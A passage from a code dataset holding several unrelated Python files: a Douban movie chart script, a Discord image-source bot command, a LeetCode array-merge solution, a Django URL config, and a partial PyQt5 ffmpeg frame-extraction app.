]\n y = []\n for n in range(len(film_list[1])):\n y.append(\n opts.BarItem(\n name=film_list[0][n],\n value=film_list[1][n],\n itemstyle_opts=opts.ItemStyleOpts(color=colors[n]),\n )\n )\n return y\n\ndef show_comment_top():\n # 查找上映年份集合\n showtime=select_showtime()\n # 生成时间轴的图\n timeline = Timeline(init_opts=opts.InitOpts(page_title=\"豆瓣电影TOP250-评论人数TOP10的电影\"))\n for year in showtime:\n film_tuple=select_film(year)\n date_list=select_data(year)\n timeline.add_schema(is_auto_play=True, play_interval=1000)\n # 柱状图初始化\n bar = Bar()\n # 横坐标\n bar.add_xaxis(film_tuple[0])\n # 纵坐标\n bar.add_yaxis(\n \"\",\n date_list,\n # 数据靠右显示\n label_opts=opts.LabelOpts(is_show=True, position='right')\n )\n # 横纵坐标翻转\n bar.reversal_axis()\n # 全局配置\n bar.set_global_opts(\n # 标题\n title_opts=opts.TitleOpts(title=\"豆瓣电影TOP250-第{}年评论人数TOP10的电影\".format(year), pos_left='center'),\n # 横坐标隐藏\n xaxis_opts=opts.AxisOpts(is_show=False,split_number=10),\n # 纵坐标\n yaxis_opts=opts.AxisOpts(\n max_=9,\n # 字体大小\n axislabel_opts=opts.LabelOpts(font_size=10),\n # 隐藏坐标轴\n axisline_opts=opts.AxisLineOpts(is_show=False),\n # 隐藏刻度\n axistick_opts=opts.AxisTickOpts(is_show=False)\n )\n )\n # 组合组件\n grid = (\n Grid()\n .add(bar, grid_opts=opts.GridOpts(pos_top='8%', pos_bottom='12%', pos_left='25%'))\n )\n timeline.add(grid, \"{}年\".format(year))\n timeline.add_schema(is_auto_play=True, play_interval=1000,is_loop_play=False, width='820px', pos_left='60px')\n # 生成HTML\n html = \"pages/iframes/comment_top.html\"\n timeline.render(\"./templates/\" + html)\n return html\n\n","repo_name":"hxy-111/flask_douban","sub_path":"timeline_comment.py","file_name":"timeline_comment.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"34364421129","text":"\"\"\"\nDetects the source of an image using the unofficial saucenao API\n\"\"\"\n\nimport discord\nfrom discord.ext import commands as bot_commands\nfrom saucenao_api import SauceNao\nfrom utils import repo, logger\nclass SauceCog(bot_commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @bot_commands.command(aliases=[\"source\"])\n async def sauce(self, ctx):\n if ctx.message.reference == None:\n await ctx.send(\"This command only functions when used in a reply!\")\n return\n \n source = SauceNao(api_key=repo.config[\"keys\"][\"saucenao_api_key\"])\n\n reference = await ctx.channel.fetch_message(ctx.message.reference.message_id)\n if len(reference.attachments) > 0 or len(reference.embeds):\n output = \"\"\n for attachment in reference.attachments:\n try:\n output += f\"\\n{source.from_url(attachment.url)[0].urls[0]} (similarity: {source.from_url(attachment.url)[0].similarity})\"\n except Exception as e:\n logger.log(\"Source\", f\"Failed to read attachment {attachment.url}. {e}\")\n for embed in reference.embeds:\n try:\n output += f\"\\n{source.from_url(embed.thumbnail.url)[0].urls[0]} (similarity: {source.from_url(embed.thumbnail.url)[0].similarity})\"\n except Exception as e:\n logger.log(\"Source\", f\"Failed to read embed {embed.thumbnail.url}. {e}\")\n if len(output) > 0:\n await ctx.send(f\"Here's my best guess at the sources: {output}\")\n else:\n await ctx.send(f\"Failed to read the message, you may have to manually reverse-search this one\")\n else:\n await ctx.send(\"The replied message does not have any attachments, or could not be loaded.\")\n\n \n\n\ndef setup(bot):\n bot.add_cog(SauceCog(bot))","repo_name":"AriBowe/orb","sub_path":"cogs/orb_source.py","file_name":"orb_source.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"71646720234","text":"\"\"\"\nYou are given two integer arrays nums1 and nums2, sorted in non-decreasing order, \nand two integers m and n, representing the number of elements in nums1 and nums2 respectively.\n\nMerge nums1 and nums2 into a single array sorted in non-decreasing order.\n\nThe final sorted array should not be returned by the function, but instead be \nstored inside the array nums1. To accommodate this, nums1 has a length of m + n, \nwhere the first m elements denote the elements that should be merged, and the last \nn elements are set to 0 and should be ignored. nums2 has a length of n.\n\"\"\"\n\n\ndef merge( nums1: list[int], m: int, nums2: list[int], n: int) -> None:\n if not nums2:\n return\n \n for _ in range(n):\n nums1.pop()\n\n inserted = 0\n for num_to_insert in nums2:\n for i, num in enumerate(nums1):\n if num >= num_to_insert:\n nums1.insert(i, num_to_insert)\n inserted += 1\n break\n\n if inserted != len(nums2):\n nums1.extend(nums2[inserted:])","repo_name":"kennyhml/leetcode","sub_path":"easy/merge_sorted_array.py","file_name":"merge_sorted_array.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"69897385514","text":"# users/urls.py\n\n# Django modules\nfrom django.urls import path\n\n# Locals\nfrom . import views \n\napp_name = 'users'\n\nurlpatterns = [\n\tpath('register/', views.RegisterView.as_view(), name='register'),\n\tpath('login/', views.UserLoginView.as_view(), name='login'),\n\tpath('logout/', views.UserLogoutView.as_view(),name=\"logout\"),\n\n] ","repo_name":"gurnitha/django-fantom-blog","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10247457289","text":"''' Notes\r\nDownloaded K-Lite Video Codec to get the video player to work\r\n'''\r\n\r\n\r\n\r\n\r\nimport logging\r\nimport os\r\nimport subprocess\r\nimport sys\r\nfrom time import time\r\nimport webbrowser\r\n\r\nfrom PyQt5.QtCore import QThread, QUrl, pyqtSignal, Qt\r\nfrom PyQt5.QtGui import QIcon, QPixmap, QIntValidator\r\nfrom PyQt5.QtMultimedia import QMediaPlayer, QMediaContent\r\nfrom PyQt5.QtMultimediaWidgets import QVideoWidget\r\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QVBoxLayout, QHBoxLayout, \r\n QPushButton, QTextEdit, QProgressBar, QFileDialog, QLabel, \r\n QLineEdit, QComboBox, QWidget, QCheckBox, QSlider, \r\n QGroupBox, QLayout, QMessageBox)\r\n\r\nimport qdarktheme\r\n\r\n# Start Logging\r\nif not os.path.exists('./Logs'):\r\n os.makedirs('./Logs')\r\n \r\nlogging.basicConfig(filename='./Logs/log.log', level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\r\n\r\n\r\nlogging.info(\"Application started.\")\r\n\r\nclass StreamToLogger:\r\n def __init__(self, original_stream, logger, log_level):\r\n self.original_stream = original_stream\r\n self.logger = logger\r\n self.log_level = log_level\r\n\r\n def write(self, message):\r\n if message.rstrip() != \"\":\r\n self.logger.log(self.log_level, message.rstrip())\r\n self.original_stream.write(message)\r\n\r\n def flush(self):\r\n self.original_stream.flush()\r\n\r\n# Redirect standard output and standard error\r\nsys.stdout = StreamToLogger(sys.stdout, logging.getLogger(), logging.INFO)\r\nsys.stderr = StreamToLogger(sys.stderr, logging.getLogger(), logging.ERROR)\r\n\r\n\r\n\r\ndef handle_uncaught_exception(exc_type, exc_value, exc_traceback):\r\n logging.error(\"Uncaught exception\",\r\n exc_info=(exc_type, exc_value, exc_traceback))\r\n\r\nsys.excepthook = handle_uncaught_exception\r\n\r\n\r\ndef get_video_duration(video_path):\r\n cmd = [\"ffmpeg\", \"-i\", video_path]\r\n result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, creationflags=subprocess.CREATE_NO_WINDOW)\r\n for line in result.stderr.split(\"\\n\"):\r\n if \"Duration\" in line:\r\n time_parts = line.split(\",\")[0].split(\"Duration:\")[1].strip().split(\":\")\r\n hours, minutes, seconds = time_parts\r\n total_seconds = int(hours) * 3600 + int(minutes) * 60 + float(seconds)\r\n return total_seconds\r\n return None\r\n\r\nclass FrameExtractorWorker(QThread):\r\n # Signals\r\n update_progress_signal = pyqtSignal(int)\r\n update_status_signal = pyqtSignal(str)\r\n update_frames_signal = pyqtSignal(str)\r\n first_frame_signal = pyqtSignal(str)\r\n last_frame_signal = pyqtSignal(str)\r\n extraction_completed_signal = pyqtSignal(int, str) \r\n \r\n\r\n\r\n\r\n def __init__(self, video_path, output_dir, interval, frame_name, output_format, resolution, use_gpu=False, gpu_method=\"\"):\r\n super().__init__()\r\n self.video_path = video_path\r\n self.output_dir = output_dir\r\n self.interval = interval\r\n self.frame_name = frame_name\r\n self.output_format = output_format\r\n self.resolution = resolution\r\n self.cancel_extraction = False\r\n self.use_gpu = use_gpu\r\n self.gpu_method = gpu_method\r\n \r\n\r\n def run(self):\r\n if not os.path.exists(self.output_dir):\r\n os.makedirs(self.output_dir)\r\n\r\n video_duration = get_video_duration(self.video_path)\r\n if video_duration is None:\r\n error_msg = \"Couldn't determine video duration. Exiting.\"\r\n print(error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n num_screenshots = int(video_duration) // self.interval\r\n start_time = time()\r\n\r\n for i in range(num_screenshots):\r\n if self.cancel_extraction:\r\n self.update_status_signal.emit(\"Extraction Cancelled!\")\r\n break\r\n\r\n timestamp = i * self.interval\r\n base_name = self.frame_name if self.frame_name else \"frame\"\r\n output_file = os.path.join(self.output_dir, f\"{base_name}_{i:03d}.{self.output_format}\")\r\n\r\n # Determine the codec based on the selected format\r\n codec = self.output_format\r\n if codec == \"jpg\":\r\n codec = \"mjpeg\"\r\n elif codec == \"png\":\r\n codec = \"png\"\r\n elif codec == \"bmp\":\r\n codec = \"bmp\"\r\n elif codec == \"tiff\":\r\n codec = \"tiff\"\r\n\r\n width, height = self.resolution.split(\"x\")\r\n cmd = [\"ffmpeg\", \"-ss\", str(timestamp), \"-i\", self.video_path, \"-vf\", f\"scale={width}:{height}\", \"-vframes\", \"1\", \"-c:v\", codec, \"-an\", output_file]\r\n\r\n\r\n\r\n if self.use_gpu:\r\n if self.gpu_method == \"cuda\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"cuda\")\r\n elif self.gpu_method == \"dxva2\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"dxva2\")\r\n elif self.gpu_method == \"qsv\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"qsv\")\r\n elif self.gpu_method == \"d3d11va\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"d3d11va\")\r\n elif self.gpu_method == \"opencl\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"opencl\")\r\n elif self.gpu_method == \"vulkan\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"vulkan\")\r\n\r\n \r\n result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, creationflags=subprocess.CREATE_NO_WINDOW)\r\n if result.returncode != 0:\r\n error_msg = f\"Error on extracting frame {i}: {result.stderr}\"\r\n print(error_msg)\r\n logging.error(error_msg)\r\n\r\n # Emit signals for UI updates\r\n elapsed_time = time() - start_time\r\n remaining_time = ((video_duration - (i * self.interval)) / self.interval) * (elapsed_time / (i+1))\r\n self.update_progress_signal.emit(int((i + 1) / num_screenshots * 100))\r\n self.update_status_signal.emit(f\"Elapsed Time: {int(elapsed_time)}s | Time Remaining: {int(remaining_time)}s\")\r\n self.update_frames_signal.emit(f\"Frames Created: {i+1}/{num_screenshots}\")\r\n\r\n # Emit signal for the first frame only once\r\n if i == 0:\r\n self.first_frame_signal.emit(output_file)\r\n\r\n # Emit signal for the last frame after every extraction\r\n self.last_frame_signal.emit(output_file)\r\n \r\n if not self.cancel_extraction:\r\n self.extraction_completed_signal.emit(num_screenshots, self.output_dir)\r\n\r\n\r\n\r\n def stop(self):\r\n self.cancel_extraction = True\r\n\r\nclass FFmpegFrameExtractorApp(QMainWindow):\r\n\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n \r\n # Connect to the mediaStatusChanged signal\r\n self.video_player.mediaStatusChanged.connect(self.handle_media_status_change)\r\n\r\n def initUI(self):\r\n main_widget = QWidget(self)\r\n self.setCentralWidget(main_widget)\r\n\r\n main_layout = QHBoxLayout() # Changed to QHBoxLayout for main layout\r\n \r\n\r\n # Left side layout\r\n left_layout = QVBoxLayout()\r\n\r\n # New vertical layout for the settings and progress bar\r\n settings_layout = QVBoxLayout()\r\n \r\n # Dark theme toggle checkbox\r\n self.dark_mode_checkbox = QCheckBox(\"Dark Mode\", self)\r\n self.dark_mode_checkbox.stateChanged.connect(self.toggle_dark_mode)\r\n settings_layout.addWidget(self.dark_mode_checkbox)\r\n \r\n # Toggle Video Player\r\n self.toggle_video_player_checkbox = QCheckBox(\"Show Video Player\", self)\r\n self.toggle_video_player_checkbox.setChecked(False) # Default to not showing the video player\r\n self.toggle_video_player_checkbox.stateChanged.connect(self.toggle_video_player)\r\n settings_layout.addWidget(self.toggle_video_player_checkbox)\r\n\r\n # Toggle Frame Previews\r\n self.toggle_frame_previews_checkbox = QCheckBox(\"Show Frame Previews\", self)\r\n self.toggle_frame_previews_checkbox.setChecked(False) # Default to not showing the frame previews\r\n self.toggle_frame_previews_checkbox.stateChanged.connect(self.toggle_frame_previews)\r\n settings_layout.addWidget(self.toggle_frame_previews_checkbox)\r\n\r\n\r\n # File Frame\r\n \r\n # Video Path\r\n self.video_path_entry = QLineEdit(self)\r\n settings_layout.addWidget(QLabel(\"Video Path:\"))\r\n self.browse_video_btn = QPushButton(QIcon('./images/browse.png'), \"\", self)\r\n self.browse_video_btn.clicked.connect(self.select_video_file)\r\n video_path_layout = QHBoxLayout()\r\n video_path_layout.addWidget(self.video_path_entry)\r\n video_path_layout.addWidget(self.browse_video_btn)\r\n settings_layout.addLayout(video_path_layout)\r\n\r\n # Output Directory\r\n self.output_dir_entry = QLineEdit(self)\r\n settings_layout.addWidget(QLabel(\"Output Directory:\"))\r\n self.browse_output_dir_btn = QPushButton(QIcon('./images/browse.png'), \"\", self)\r\n self.browse_output_dir_btn.clicked.connect(self.select_output_directory)\r\n output_dir_layout = QHBoxLayout()\r\n output_dir_layout.addWidget(self.output_dir_entry)\r\n output_dir_layout.addWidget(self.browse_output_dir_btn)\r\n settings_layout.addLayout(output_dir_layout)\r\n\r\n \r\n # More Settings\r\n \r\n # #Interval Slider\r\n self.interval_slider = QSlider(Qt.Horizontal, self)\r\n self.interval_slider.setRange(1, 600) # 1 to 600 seconds range\r\n self.interval_slider.setValue(10) # Default value\r\n self.interval_slider.valueChanged.connect(self.update_interval_entry)\r\n\r\n self.interval_entry = QLineEdit(\"10\", self) # Default value\r\n self.interval_entry.setValidator(QIntValidator(1, 600)) # Only allow integers between 1 and 600\r\n self.interval_entry.textChanged.connect(self.update_interval_slider_from_entry)\r\n self.interval_entry.setFixedWidth(50) # Adjust width as needed\r\n\r\n interval_layout = QHBoxLayout()\r\n interval_layout.addWidget(QLabel(\"Interval (in seconds):\"))\r\n interval_layout.addWidget(self.interval_slider)\r\n interval_layout.addWidget(self.interval_entry)\r\n\r\n settings_layout.addLayout(interval_layout)\r\n \r\n # Output Format\r\n self.output_format = QComboBox(self)\r\n self.output_format.addItems([\"png\", \"jpg\", \"bmp\", \"tiff\"])\r\n\r\n # Resolution\r\n self.resolution_dropdown = QComboBox(self)\r\n self.resolution_dropdown.addItems([\"4K (3840x2160)\", \"2K (2560x1440)\", \"1080p (1920x1080)\", \"720p (1280x720)\", \"640p (640x480)\", \"480p (854x480)\"])\r\n \r\n # Output and Resolution Drop Downs\r\n format_layout = QHBoxLayout()\r\n format_layout.addWidget(QLabel(\"Output Format (lossless):\"))\r\n format_layout.addWidget(self.output_format)\r\n format_layout.addWidget(QLabel(\"Resolution:\"))\r\n format_layout.addWidget(self.resolution_dropdown)\r\n settings_layout.addLayout(format_layout)\r\n\r\n\r\n\r\n \r\n # File Name\r\n self.frame_name_entry = QLineEdit(self)\r\n settings_layout.addWidget(QLabel(\"Frame Name:\"))\r\n settings_layout.addWidget(self.frame_name_entry)\r\n \r\n # GPU Acceleration Frame\r\n gpu_acceleration_group = QGroupBox(\"GPU Acceleration (Beta)\", self)\r\n gpu_acceleration_layout = QVBoxLayout()\r\n\r\n self.gpu_accel_checkbox = QCheckBox(\"Enable GPU Acceleration\", self)\r\n gpu_acceleration_layout.addWidget(self.gpu_accel_checkbox)\r\n\r\n self.gpu_accel_method = QComboBox(self)\r\n self.gpu_accel_method.addItems([\"cuda\", \"dxva2\", \"qsv\", \"d3d11va\", \"opencl\", \"vulkan\"])\r\n gpu_acceleration_layout.addWidget(QLabel(\"Acceleration Method:\"))\r\n gpu_acceleration_layout.addWidget(self.gpu_accel_method)\r\n\r\n gpu_acceleration_group.setLayout(gpu_acceleration_layout)\r\n settings_layout.addWidget(gpu_acceleration_group)\r\n \r\n # Spacer before progress bar\r\n settings_layout.addStretch(1)\r\n \r\n self.progress_bar = QProgressBar(self)\r\n self.progress_bar.setMinimumWidth(200)\r\n settings_layout.addWidget(self.progress_bar)\r\n\r\n # Spacer after progress bar\r\n settings_layout.addStretch(1)\r\n \r\n # Add the settings_layout to the left_layout\r\n left_layout.addLayout(settings_layout)\r\n \r\n self.status_label = QLabel(self)\r\n left_layout.addWidget(self.status_label)\r\n self.frames_label = QLabel(self)\r\n left_layout.addWidget(self.frames_label)\r\n\r\n button_layout = QHBoxLayout()\r\n self.start_btn = QPushButton(\"Start Extraction\", self)\r\n self.start_btn.setStyleSheet(\"background-color: green; color: white;\")\r\n self.start_btn.clicked.connect(self.start_extraction)\r\n button_layout.addWidget(self.start_btn)\r\n\r\n self.open_dir_btn = QPushButton(\"Open Directory\", self)\r\n self.open_dir_btn.clicked.connect(self.open_directory)\r\n button_layout.addWidget(self.open_dir_btn)\r\n\r\n self.cancel_btn = QPushButton(\"Cancel Extraction\", self)\r\n self.cancel_btn.setStyleSheet(\"background-color: red; color: white;\")\r\n self.cancel_btn.clicked.connect(self.handle_cancel)\r\n button_layout.addWidget(self.cancel_btn)\r\n\r\n left_layout.addLayout(button_layout)\r\n \r\n # Video Preview\r\n video_layout = QVBoxLayout()\r\n self.video_player = QMediaPlayer(self)\r\n self.video_widget = QVideoWidget(self)\r\n self.video_widget.setFixedSize(400, 300)\r\n self.video_title_label = QLabel(\"Video Preview:\")\r\n video_layout.addWidget(self.video_title_label)\r\n video_layout.addWidget(self.video_widget)\r\n self.video_player.setVideoOutput(self.video_widget)\r\n \r\n \r\n # Video Slider and Timestamp Entry Layout\r\n slider_timestamp_layout = QHBoxLayout()\r\n\r\n # Video Slider\r\n self.video_slider = QSlider(Qt.Horizontal, self)\r\n self.video_slider.setRange(0, 0)\r\n self.video_slider.sliderMoved.connect(self.set_position)\r\n slider_timestamp_layout.addWidget(self.video_slider)\r\n \r\n self.video_player.positionChanged.connect(self.position_changed)\r\n self.video_player.durationChanged.connect(self.duration_changed)\r\n self.video_slider.sliderMoved.connect(self.set_position)\r\n self.video_slider.setTracking(False)\r\n \r\n # Timestamp Entry\r\n self.timestamp_entry = QLineEdit(self)\r\n self.timestamp_entry.setPlaceholderText(\"HH:MM:SS\")\r\n self.timestamp_entry.setMaximumWidth(80) # Adjust width as needed\r\n self.timestamp_entry.returnPressed.connect(self.seek_to_timestamp)\r\n slider_timestamp_layout.addWidget(self.timestamp_entry)\r\n\r\n video_layout.addLayout(slider_timestamp_layout)\r\n\r\n # Playback Controls\r\n controls_layout = QHBoxLayout()\r\n self.play_btn = QPushButton(\"Play\", self)\r\n self.play_btn.clicked.connect(self.video_player.play)\r\n controls_layout.addWidget(self.play_btn)\r\n\r\n self.pause_btn = QPushButton(\"Pause\", self)\r\n self.pause_btn.clicked.connect(self.video_player.pause)\r\n controls_layout.addWidget(self.pause_btn)\r\n\r\n self.stop_btn = QPushButton(\"Stop\", self)\r\n self.stop_btn.clicked.connect(self.video_player.stop)\r\n controls_layout.addWidget(self.stop_btn)\r\n\r\n video_layout.addLayout(controls_layout)\r\n left_layout.addLayout(video_layout)\r\n \r\n # Quick Extract\r\n self.quick_extract_btn = QPushButton(\"Quick Extract\", self)\r\n self.quick_extract_btn.clicked.connect(self.quick_extract)\r\n left_layout.addWidget(self.quick_extract_btn)\r\n \r\n # Right side layout for previews\r\n right_layout = QVBoxLayout()\r\n \r\n # First Frame\r\n self.first_frame_label = QLabel(self)\r\n self.first_frame_label.setFixedSize(400, 300)\r\n self.first_frame_title_label = QLabel(\"First Frame:\")\r\n right_layout.addWidget(self.first_frame_title_label)\r\n right_layout.addWidget(self.first_frame_label)\r\n \r\n # Last Frame\r\n self.last_frame_label = QLabel(self)\r\n self.last_frame_label.setFixedSize(400, 300)\r\n self.last_frame_title_label = QLabel(\"Last Frame:\")\r\n right_layout.addWidget(self.last_frame_title_label)\r\n right_layout.addWidget(self.last_frame_label)\r\n \r\n # Add left and right layouts to main layout\r\n main_layout.addLayout(left_layout)\r\n main_layout.addLayout(right_layout)\r\n \r\n main_widget.setLayout(main_layout)\r\n\r\n # Set window properties\r\n self.setWindowTitle('VidFrameFetcher')\r\n self.setWindowIcon(QIcon('./images/icon.png')) # Update path as needed\r\n self.resize(0, 0) # Adjust size if needed\r\n \r\n # Accept Drops\r\n self.setAcceptDrops(True)\r\n \r\n # Hide the corresponding widgets by default\r\n self.toggle_video_player(Qt.Unchecked)\r\n self.toggle_frame_previews(Qt.Unchecked)\r\n\r\n # Adjust the window size\r\n self.adjustSize()\r\n \r\n # Ensure the window cannot be resized larger than the size hint of its layout\r\n self.layout().setSizeConstraint(QLayout.SetFixedSize)\r\n \r\n \r\n '''# Tool Tips\r\n \r\n #QLineEdit\r\n self.video_path_entry.setToolTip(\"Path to the video file you want to extract frames from.\")\r\n self.output_dir_entry.setToolTip(\"Directory where the extracted frames will be saved.\")\r\n self.frame_name_entry.setToolTip(\"Base name for the extracted frames.\")\r\n self.timestamp_entry.setToolTip(\"Enter a timestamp (HH:MM:SS) to seek to that position in the video.\")\r\n \r\n #QComboBox\r\n self.output_format.setToolTip(\"Select the format for the extracted frames.\")\r\n self.resolution_dropdown.setToolTip(\"Select the resolution for the extracted frames.\")\r\n self.gpu_accel_method.setToolTip(\"Select the GPU acceleration method (if GPU acceleration is enabled).\")\r\n \r\n #QCheckBox\r\n self.dark_mode_checkbox.setToolTip(\"Toggle dark mode for the application.\")\r\n self.toggle_video_player_checkbox.setToolTip(\"Show or hide the video player.\")\r\n self.toggle_frame_previews_checkbox.setToolTip(\"Show or hide the frame previews.\")\r\n self.gpu_accel_checkbox.setToolTip(\"Enable or disable GPU acceleration for frame extraction.\")\r\n \r\n #QSlider\r\n self.interval_slider.setToolTip(\"Set the interval (in seconds) between extracted frames.\")\r\n self.video_slider.setToolTip(\"Seek to a specific position in the video.\")\r\n \r\n #QPushButton\r\n self.browse_video_btn.setToolTip(\"Browse and select a video file.\")\r\n self.browse_output_dir_btn.setToolTip(\"Browse and select an output directory.\")\r\n self.start_btn.setToolTip(\"Start the frame extraction process.\")\r\n self.open_dir_btn.setToolTip(\"Open the selected output directory.\")\r\n self.cancel_btn.setToolTip(\"Cancel the ongoing frame extraction process.\")\r\n self.play_btn.setToolTip(\"Play the video.\")\r\n self.pause_btn.setToolTip(\"Pause the video.\")\r\n self.stop_btn.setToolTip(\"Stop the video.\")\r\n self.quick_extract_btn.setToolTip(\"Quickly extract a frame from the current video position.\")\r\n \r\n #QGroupBox\r\n gpu_acceleration_group.setToolTip(\"Settings related to GPU acceleration for frame extraction.\")\r\n\r\n #QProgressBar\r\n self.progress_bar.setToolTip(\"Shows the progress of the frame extraction process.\")\r\n \r\n #QLabel\r\n self.first_frame_label.setToolTip(\"Preview of the first extracted frame.\")\r\n self.last_frame_label.setToolTip(\"Preview of the last extracted frame.\")'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n def update_first_frame_preview(self, frame_path):\r\n pixmap = QPixmap(frame_path).scaled(400, 300, Qt.KeepAspectRatio, Qt.SmoothTransformation)\r\n self.first_frame_label.setPixmap(pixmap)\r\n\r\n def update_last_frame_preview(self, frame_path):\r\n pixmap = QPixmap(frame_path).scaled(400, 300, Qt.KeepAspectRatio, Qt.SmoothTransformation)\r\n self.last_frame_label.setPixmap(pixmap)\r\n\r\n def toggle_dark_mode(self, state):\r\n if state == Qt.Checked:\r\n qdarktheme.setup_theme()\r\n else:\r\n qdarktheme.setup_theme(\"light\") # or perhaps the default theme of your app\r\n \r\n def select_video_file(self):\r\n options = QFileDialog.Options()\r\n filepath, _ = QFileDialog.getOpenFileName(self, \"Select a Video File\", \"\", \"Video Files (*.mp4; *.mkv; *.avi; *.mov);;All Files (*)\", options=options)\r\n if filepath:\r\n self.video_path_entry.setText(filepath)\r\n self.video_player.setMedia(QMediaContent(QUrl.fromLocalFile(filepath)))\r\n\r\n def handle_media_status_change(self, status):\r\n if status == QMediaPlayer.MediaStatus.LoadedMedia:\r\n # Media is loaded and ready to play\r\n pass\r\n elif status in [QMediaPlayer.MediaStatus.InvalidMedia, QMediaPlayer.MediaStatus.NoMedia, QMediaPlayer.MediaStatus.UnknownMediaStatus]:\r\n error_msg = f\"Unable to play the provided video file: {self.video_path_entry.text()}\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n\r\n def select_output_directory(self):\r\n options = QFileDialog.Options()\r\n directory = QFileDialog.getExistingDirectory(self, \"Select an Output Directory\", \"\", options=options)\r\n if directory:\r\n self.output_dir_entry.setText(directory)\r\n \r\n def update_interval_entry(self, value):\r\n self.interval_entry.setText(str(value))\r\n\r\n def update_interval_slider_from_entry(self, text):\r\n if text: # Check if the text is not empty\r\n value = int(text)\r\n self.interval_slider.setValue(value)\r\n \r\n def position_changed(self, position):\r\n self.video_slider.setValue(position)\r\n h, m, s = position // 3600000, (position % 3600000) // 60000, (position % 60000) // 1000\r\n self.timestamp_entry.setText(f\"{h:02d}:{m:02d}:{s:02d}\")\r\n\r\n\r\n def duration_changed(self, duration):\r\n self.video_slider.setRange(0, duration)\r\n\r\n def set_position(self, position):\r\n self.video_player.setPosition(position)\r\n \r\n def seek_to_timestamp(self):\r\n timestamp_str = self.timestamp_entry.text()\r\n try:\r\n h, m, s = map(int, timestamp_str.split(':'))\r\n milliseconds = (h * 3600 + m * 60 + s) * 1000\r\n self.video_player.setPosition(milliseconds)\r\n except ValueError:\r\n # Handle invalid input format\r\n pass\r\n\r\n # Quick Extract \r\n def quick_extract(self):\r\n video_path = self.video_path_entry.text()\r\n output_dir = self.output_dir_entry.text()\r\n\r\n # Check if video path is valid\r\n if not video_path or not os.path.exists(video_path):\r\n error_msg = \"Please select a valid video file.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n # Check if output directory is specified\r\n if not output_dir:\r\n error_msg = \"Please specify an output directory.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n # Check if output directory exists, if not, create it\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n\r\n timestamp = self.video_player.position() / 1000 # Convert from ms to seconds\r\n base_name = \"snapshot\"\r\n output_file = os.path.join(output_dir, f\"{base_name}_{int(timestamp)}.png\")\r\n\r\n cmd = [\"ffmpeg\", \"-ss\", str(timestamp), \"-i\", video_path, \"-vf\", f\"scale=-1:1080\", \"-vframes\", \"1\", \"-c:v\", \"png\", \"-an\", output_file]\r\n \r\n if self.gpu_accel_checkbox.isChecked():\r\n method = self.gpu_accel_method.currentText()\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, method)\r\n\r\n result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, creationflags=subprocess.CREATE_NO_WINDOW)\r\n if result.returncode != 0:\r\n error_msg = f\"Error on extracting snapshot at {timestamp}s:\\n{result.stderr}\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n else:\r\n print(f\"Snapshot saved to {output_file}\")\r\n \r\n # Hide/Show Video Player / Frame Preview methods\r\n def toggle_video_player(self, state):\r\n if state == Qt.Checked:\r\n self.video_title_label.show()\r\n self.video_widget.show()\r\n self.play_btn.show()\r\n self.pause_btn.show()\r\n self.stop_btn.show()\r\n self.video_slider.show()\r\n self.timestamp_entry.show() # Add this line\r\n self.quick_extract_btn.show()\r\n else:\r\n self.video_title_label.hide()\r\n self.video_widget.hide()\r\n self.play_btn.hide()\r\n self.pause_btn.hide()\r\n self.stop_btn.hide()\r\n self.video_slider.hide()\r\n self.timestamp_entry.hide() # Add this line\r\n self.quick_extract_btn.hide()\r\n self.adjustSize()\r\n\r\n\r\n def toggle_frame_previews(self, state):\r\n if state == Qt.Checked:\r\n self.first_frame_title_label.show()\r\n self.first_frame_label.show()\r\n self.last_frame_title_label.show()\r\n self.last_frame_label.show()\r\n else:\r\n self.first_frame_title_label.hide()\r\n self.first_frame_label.hide()\r\n self.last_frame_title_label.hide()\r\n self.last_frame_label.hide()\r\n self.adjustSize()\r\n \r\n\r\n # Start Extraction \r\n def start_extraction(self):\r\n video_path = self.video_path_entry.text()\r\n output_dir = self.output_dir_entry.text()\r\n\r\n if not video_path or not os.path.exists(video_path):\r\n error_msg = \"Please select a valid video file.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n if not os.path.exists(output_dir):\r\n error_msg = f\"Output directory {output_dir} does not exist.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n video_duration = get_video_duration(video_path)\r\n if video_duration is None:\r\n error_msg = \"Couldn't determine video duration. Exiting.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n 